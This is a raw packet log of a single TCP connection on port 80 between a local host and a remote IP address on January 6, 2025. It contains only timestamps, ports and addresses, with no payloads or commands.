Jan 6, 2025 07:57:58.628377914 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628400087 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628427029 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628499985 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628511906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628523111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628544092 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628638983 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628650904 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628660917 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628670931 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628683090 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628690004 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628700972 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628726006 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628784895 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628798008 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628808975 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628819942 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628832102 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628843069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.628848076 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.628878117 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629071951 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629082918 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629093885 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629106045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629117012 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629136086 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629168034 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629195929 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629209042 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629219055 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629240036 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629272938 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629383087 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629395008 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629405975 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629415989 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.629426003 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.629462957 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.632800102 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632812023 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632823944 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632838011 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632863998 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.632899046 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.632937908 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632963896 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632975101 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632986069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.632997990 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633009911 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633009911 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633025885 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633057117 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633069038 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633083105 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633094072 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633105040 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633135080 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633167982 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633389950 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633399963 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633424044 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633435011 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633440971 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633450985 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633469105 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633475065 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633482933 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633486986 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633498907 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633511066 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633511066 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633538008 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633538961 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633553982 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633559942 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633569956 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633579016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633590937 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633605003 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633611917 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633624077 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633625031 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633637905 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633649111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633655071 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633661032 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633673906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633682013 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633685112 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633694887 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633698940 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633711100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.633729935 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633743048 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.633990049 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634001017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634011030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634038925 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634044886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634057045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634068966 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634080887 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634087086 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634110928 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634124994 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634136915 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634146929 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634159088 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634166002 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634171963 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634200096 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634215117 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634238005 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634253979 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634265900 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634277105 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634289980 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634295940 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634303093 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634314060 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634322882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634340048 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634342909 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634393930 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634406090 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634418964 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.634421110 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.634447098 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.635040998 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635052919 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635062933 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635073900 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635083914 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.635087967 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635099888 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635108948 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.635111094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635123014 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635135889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635138988 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.635150909 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.635154009 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.635186911 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.641904116 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714044094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714061022 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714086056 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714098930 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714108944 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714134932 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714147091 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714157104 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714169025 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714184046 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714205980 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714217901 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714227915 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714238882 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714251041 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714257002 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714257002 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714270115 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714273930 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714273930 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714273930 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714329004 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714468002 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714479923 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714492083 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714504004 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714524031 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714541912 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714560986 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714572906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714590073 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714642048 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714694023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714694023 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714730978 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714742899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714759111 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714771032 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714778900 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714785099 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714798927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714809895 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.714828968 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.714860916 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715147972 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715188980 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715202093 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715209961 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715214968 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715226889 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715236902 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715240955 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715250969 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715270042 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715271950 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715286016 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715291977 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715296030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715320110 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715326071 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715339899 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715361118 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715369940 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715373993 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715385914 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715405941 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715406895 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715416908 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715428114 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715429068 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715444088 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715461969 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715461969 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715475082 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715485096 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715497017 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715497017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715509892 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715528965 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715532064 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715540886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715550900 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715554953 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715570927 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715579987 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715584993 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715595961 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715604067 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715610027 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715624094 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715636969 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715666056 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715802908 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715815067 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715825081 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715836048 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715848923 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715850115 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715869904 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715869904 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715883017 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715905905 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715909958 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715939045 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715940952 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715960026 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715974092 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.715981007 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.715987921 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716006994 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716015100 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.716020107 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716032028 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716043949 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716052055 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.716067076 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716075897 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.716079950 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.716106892 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.722732067 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846013069 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846038103 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846057892 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846076012 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846087933 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846097946 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846116066 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846137047 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846154928 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846179962 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846191883 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846191883 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846201897 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846215010 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846223116 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846235991 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846246958 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846249104 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846259117 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846268892 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846272945 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846287012 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846293926 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846297979 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846328974 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846335888 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846340895 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846352100 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846366882 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846390009 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846395969 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846402884 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846421957 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846434116 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846445084 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846448898 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846471071 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846491098 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846502066 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846519947 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846530914 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846532106 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846543074 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846560955 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846577883 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846616030 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846626043 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846636057 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846652031 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846659899 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846664906 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846685886 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846687078 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846695900 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846738100 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846796036 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846807003 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846821070 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846838951 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846838951 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846851110 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846862078 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846865892 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846888065 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846905947 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846906900 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846918106 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846926928 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846931934 CET	49731	80	192.168.2.4	166.62.27.188
Jan 6, 2025 07:57:58.846940041 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846951962 CET	80	49731	166.62.27.188	192.168.2.4
Jan 6, 2025 07:57:58.846966982 CET	80	49731	166.62.27.188	192.168.2.4
